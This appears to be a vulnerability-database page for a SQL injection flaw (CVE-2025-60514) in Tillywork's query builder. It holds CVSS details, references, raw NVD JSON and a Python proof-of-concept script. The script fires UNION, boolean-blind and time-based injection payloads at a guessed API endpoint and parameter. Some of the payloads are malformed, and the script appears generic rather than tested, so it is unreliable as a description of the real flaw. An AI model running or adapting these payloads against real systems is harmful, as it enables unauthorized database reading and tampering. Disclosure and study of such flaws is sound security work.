CVE-2025-60514

Description

Tillywork v0.1.3 and below is vulnerable to SQL Injection in app/common/helpers/query.builder.helper.ts.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tillywork <= v0.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-60514 - Tillywork SQL Injection PoC
# Vulnerable file: app/common/helpers/query.builder.helper.ts
# Affected versions: Tillywork <= v0.1.3

import requests

TARGET_URL = "https://target-tillywork-instance.com"
# The vulnerability exists in query builder helper, exploitable via API endpoints
# that use unsanitized user input in SQL query construction.

def exploit_sql_injection(endpoint, injection_payload):
    """
    Exploit SQL injection in Tillywork query builder helper.
    The vulnerable function dynamically constructs SQL queries using
    unsanitized user input from request parameters.
    """
    url = f"{TARGET_URL}{endpoint}"
    params = {
        "sort": injection_payload,  # Example: sort parameter passed to query builder
        "order": "ASC"
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    response = requests.get(url, params=params, headers=headers, timeout=10)
    return response

# Example 1: UNION-based injection to extract database version
payload_union = "id; UNION SELECT 1,version(),database(),user(),5,6-- -"
# Example 2: Boolean-based blind injection
payload_blind = "id AND 1=1-- -"
payload_blind_false = "id AND 1=2-- -"
# Example 3: Time-based blind injection
payload_time = "id; SELECT SLEEP(5)-- -"

if __name__ == "__main__":
    # Test UNION-based injection
    print("[*] Testing UNION-based SQL injection...")
    resp = exploit_sql_injection("/api/records/list", payload_union)
    print(f"[+] Status: {resp.status_code}")
    print(f"[+] Response: {resp.text[:500]}")
    
    # Test time-based blind injection
    print("\n[*] Testing time-based blind SQL injection...")
    resp = exploit_sql_injection("/api/records/list", payload_time)
    print(f"[+] Response time: {resp.elapsed.total_seconds()}s")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60514/
[4] VulDB https://vuldb.com/cve/CVE-2025-60514
[5] https://github.com/tillywork/tillywork/pull/288/commits/c57171fd17a857d7ec79e9051b23ace98d5c6a17
[6] https://www.secstrike.ai/cve-2025-60514-tillywork-sql-injection-public-disclosure/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60514", "sourceIdentifier": "[email protected]", "published": "2025-10-17T18:15:37.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tillywork v0.1.3 and below is vulnerable to SQL Injection in app/common/helpers/query.builder.helper.ts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/tillywork/tillywork/pull/288/commits/c57171fd17a857d7ec79e9051b23ace98d5c6a17", "source": "[email protected]"}, {"url": "https://www.secstrike.ai/cve-2025-60514-tillywork-sql-injection-public-disclosure/", "source": "[email protected]"}]}}